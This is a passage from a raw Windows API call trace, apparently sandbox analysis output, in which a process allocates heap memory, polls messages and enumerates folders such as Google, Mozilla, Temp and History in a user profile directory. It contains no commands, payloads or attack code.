Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3688 [0207.656] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.657] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.657] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa020, dwReserved1=0x25c6e50, cFileName="Apps", cAlternateFileName="")) returned 1 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.657] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.657] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.657] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.658] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.658] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.658] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9420, dwReserved1=0x25c6e50, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.658] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.658] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.659] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0207.659] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.659] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.659] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x24aa020, dwReserved1=0x25c6e50, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36c0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.659] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.659] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.660] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3688 [0207.660] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.660] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.661] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9c18, dwReserved1=0x25c6e50, cFileName="Google", cAlternateFileName="")) returned 1 [0207.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0207.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="History", cAlternateFileName="")) returned 1 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.661] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0x24a9c18, dwReserved1=0x25c6e50, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa020, dwReserved1=0x25c6e50, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa0b0, dwReserved1=0x25c6e50, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.662] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9c18, dwReserved1=0x25c6e50, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x89f2df0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x89f2df0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa020, dwReserved1=0x25c6e50, cFileName="Temp", cAlternateFileName="")) returned 1 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.663] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] FindNextFileW (in: 